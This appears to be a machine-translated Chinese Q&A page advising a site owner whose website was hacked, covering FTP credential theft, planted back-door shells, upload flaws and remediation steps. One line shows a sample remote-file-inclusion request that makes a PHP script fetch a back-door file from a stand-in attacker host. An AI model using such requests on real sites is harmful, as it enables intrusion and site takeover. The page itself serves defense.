![]() |
1
6
您的网站已被黑客使用 exploit code .
|
![]() |
2
7
首先,如果您使用的是像FileZilla这样的免费FTP程序,您应该知道这些程序将其保存的登录凭据存储在纯文本文件中。病毒很容易找到这些文件,读取它们并将信息发送到服务器,然后服务器使用有效凭据登录到FTP,将某些文件复制到自身,感染它们,然后将它们发送回网站。通常情况下,它也会将这些“后门”shell脚本复制到网站上,以便在更改FTP密码时,它们仍然可以重新感染网站。
/路径/folder/other/folder/file.php? http://www.hackerswebsite.com/id.txt 其中路径/文件夹字符串仅用于演示。 有时,该命令起作用,他们能够将id.txt复制到预期的网站,因此有一个后门shell脚本,他们可以从中操作文件。 更改所有密码-FTP、数据库、cPanel或其他管理接口。
更改为SFTP。 检查所有文件夹的755权限和所有文件的644权限。这就是标准。 如果是SQL注入,感染就不会在文件末尾。它可能在某个地方有一个SQL调用来生成内容。 对。使用今天的后门,攻击者可以而且可能已经查看了保存MySQL数据的config.php文件。
|
![]() |
3
0
你的网站上可能有一个没有被正确过滤的上传机制。例如,如果你有能力使用一个配置文件图片,有人可以上传一个php文件,并找到一种方法来执行它,并获得对你的网站的控制权。 x76x09.php是一个未经审查的目录浏览器/上载程序,允许恶意上载程序完全控制您的网站。 请确保您临时禁用了所有将文件立即上载到服务器的方法,并删除了所有文件中的所有恶意代码实例。 |